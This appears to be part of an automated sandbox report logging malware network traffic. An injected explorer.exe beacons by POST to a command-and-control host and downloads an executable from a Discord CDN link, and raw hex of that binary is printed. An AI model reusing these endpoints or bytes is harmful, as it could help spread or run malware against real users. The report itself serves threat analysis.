                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    65192.168.2.34988194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.759860992 CET17260OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://wuqrydcob.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 343
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.855405092 CET17260INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:50 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    66192.168.2.34988294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:59:50.951777935 CET17261OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://khptceilp.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 301
                                                                                                                                                                                                    Host: host-data-coin-11.com


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    67192.168.2.34988394.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    68192.168.2.34988994.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    69192.168.2.34989094.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    7192.168.2.34974894.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.499056101 CET1113OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://fggjhikg.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 360
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.584256887 CET1114INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:58:58 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    70192.168.2.34989194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    71192.168.2.34989394.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    72192.168.2.34989494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    73192.168.2.34989594.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    74192.168.2.34989894.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    75192.168.2.34989994.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    76192.168.2.34990194.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    77192.168.2.34990294.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    78192.168.2.34990394.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    79192.168.2.34990494.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    8192.168.2.34974994.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.944475889 CET1115OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://slshljche.com/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.026256084 CET1116INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:58:59 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    80192.168.2.34990594.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    81192.168.2.34990694.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    9192.168.2.34975094.142.143.9180C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.394917965 CET1116OUTPOST / HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Referer: http://fqtuljhoii.net/
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Content-Length: 157
                                                                                                                                                                                                    Host: host-data-coin-11.com
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.475620985 CET1117INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:58:59 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    0192.168.2.349760185.233.81.115443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    2022-01-14 03:59:04 UTC0OUTGET /32739433.dat?iddqd=1 HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: 185.233.81.115
                                                                                                                                                                                                    2022-01-14 03:59:04 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:04 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 153
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    2022-01-14 03:59:04 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    1192.168.2.349804162.159.133.233443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC0OUTGET /attachments/903666793514672200/930134152861343815/Nidifying.exe HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: cdn.discordapp.com
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:13 GMT
                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                    Content-Length: 537088
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    CF-Ray: 6cd3f34f0c2d7033-FRA
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Age: 300797
                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                    Content-Disposition: attachment;%20filename=Nidifying.exe
                                                                                                                                                                                                    ETag: "d7df01d8158bfaddc8ba48390e52f355"
                                                                                                                                                                                                    Expires: Sat, 14 Jan 2023 03:59:13 GMT
                                                                                                                                                                                                    Last-Modified: Mon, 10 Jan 2022 16:21:03 GMT
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                    x-goog-generation: 1641831663140006
                                                                                                                                                                                                    x-goog-hash: crc32c=9zjujw==
                                                                                                                                                                                                    x-goog-hash: md5=198B2BWL+t3Iukg5DlLzVQ==
                                                                                                                                                                                                    x-goog-metageneration: 1
                                                                                                                                                                                                    x-goog-storage-class: STANDARD
                                                                                                                                                                                                    x-goog-stored-content-encoding: identity
                                                                                                                                                                                                    x-goog-stored-content-length: 537088
                                                                                                                                                                                                    X-GUploader-UploadID: ADPycdtAUXQOPbnIyWc7HwHE6Jjoo94_slb40xzLLQFjYJIeziMw89M1kSl2_68qrqD8x5Zob-f_ZoOlPr3MafIQeS5oJXYR_w
                                                                                                                                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 36 73 31 78 6b 54 43 58 49 4f 44 30 62 78 68 33 5a 59 4b 78 53 75 34 7a 45 49 25 32 46 55 6a 45 4e 25 32 46 66 57 4a 61 73 78 78 75 6d 72 56 4b 53 70 75 77 7a 76 61 41 58 32 6a 74 70 5a 4e 55 54 55 45 74 39 47 5a 7a 54 73 70 5a 4d 6c 44 34 35 53 6f 6e 30 54 42 61 6d 67 43 4f 37 75 70 52 33 35 41 77 4a 54 4c 35 6a 30 52 4c 71 4f 6e 57 42 72 43 61 50 37 76 57 43 66 53 4a 36 43 72 75 32 73 5a 38 75 79 58 25 32 46 6e 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6s1xkTCXIOD0bxh3ZYKxSu4zEI%2FUjEN%2FfWJasxxumrVKSpuwzvaAX2jtpZNUTUEt9GZzTspZMlD45Son0TBamgCO7upR35AwJTL5j0RLqOnWBrCaP7vWCfSJ6Cru2sZ8uyX%2FnA%3D%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC2INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3f 79 2a a2 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 2a 08 00 00 06 00 00 00 00 00 00 ae 49 08 00 00 20 00 00 00 60 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL?y*0*I `@ @
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC3INData Raw: 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 0e 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 13 30 06 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 00 2a 00 00 00 03 30 03 00 42 00 00 00 00 00 00 00 28 a9 00 00 06 38 01 00 00 00 2a 28 5e 01 00 06 38 00 00 00
                                                                                                                                                                                                    Data Ascii: *(*(**0***(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*0**0B(8*(^8
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC4INData Raw: 06 12 03 11 04 11 05 11 06 17 1b 1f 11 06 28 93 00 00 06 12 06 09 11 04 11 05 1c 1f 09 1f 12 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0b 1f 0e 1f 13 06 28 93 00 00 06 12 04 11 05 11 06 09 16 1f 14 1f 14 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1b 1b 1f 15 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0a 1f 09 1f 16 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0f 1f 0e 1f 17 06 28 93 00 00 06 12 04 11 05 11 06 09 1a 1f 14 1f 18 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1f 09 1b 1f 19 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0e 1f 09 1f 1a 06 28 93 00 00 06 12 05 11 06 09 11 04 19 1f 0e 1f 1b 06 28 93 00 00 06 12 04 11 05 11 06 09 1e 1f 14 1f 1c 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1f 0d 1b 1f 1d 06 28 93 00 00 06 12 06 09 11 04 11 05 18 1f 09 1f 1e 06 28
                                                                                                                                                                                                    Data Ascii: ((((((((((((((
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC6INData Raw: 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 2e 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 91 1f 18 62 05 11 07 18 58 91 1f 10 62 60 05 11 07 17 58 91 1e 62 60 05 11 07 91 60 13 06 11 04 16 13 04 25 28 a1 00 00 06 58 13 04 11 08 07 17 59 40 50 00 00 00 06 16 3e 49 00 00 00 11 04 11 06 61 13 0e 16 13 0f 38 2d 00 00 00 11 0f 16 3e 0c 00 00 00 11 0b 1e 62 13 0b 11 0c 1e 58 13 0c 08 11 0a 11 0f 58 11 0e 11 0b 5f 11 0c 1f 1f 5f 64 d2 9c 11 0f 17 58 13 0f 11 0f 06 3f cb ff ff ff 38 49 00 00 00 11 04 11 06 61 13 10 08 11 0a 11 10 20 ff 00 00 00 5f d2 9c 08 11 0a 17
                                                                                                                                                                                                    Data Ascii: Y@I>BX8#>biXY`X?8.XXbXb`Xb``%(XY@P>Ia8->bXX__dX?8Ia _
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC7INData Raw: 28 00 1f 0d 64 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2b 00 58 fe 0e 28 00 fe 0c 29 00 1b 62 fe 0c 29 00 58 fe 0c 29 00 61 fe 0c 28 00 58 fe 0e 28 00 fe 0c 28 00 76 6c 6d 58 13 09 11 0e 11 07 17 59 40 53 00 00 00 11 06 16 3e 4b 00 00 00 11 09 11 0a 61 13 13 16 13 14 38 2e 00 00 00 11 14 16 3e 0c 00 00 00 11 10 1e 62 13 10 11 11 1e 58 13 11 11 08 11 0f 11 14 58 11 13 11 10 5f 11 11 1f 1f 5f 64 d2 9c 11 14 17 58 13 14 11 14 11 06 3f c9 ff ff ff 38 4d 00 00 00 11 09 11 0a 61 13 15 11 08 11 0f 11 15 20 ff 00 00 00 5f d2 9c 11 08 11 0f 17 58 11 15 20 00 ff 00 00 5f 1e 64 d2 9c 11 08 11 0f 18 58 11 15 20 00 00 ff 00 5f 1f 10 64 d2 9c 11 08 11 0f 19 58 11 15 20 00 00 00 ff 5f 1f 18 64 d2 9c 11 0e 17 58 13 0e 11 0e 11 07 3f 26 fd ff ff 11 08 13 05 14 13 08 11 05 8e 69
                                                                                                                                                                                                    Data Ascii: (da((+X()b)X)a(X((vlmXY@S>Ka8.>bXX__dX?8Ma _X _dX _dX _dX?&i
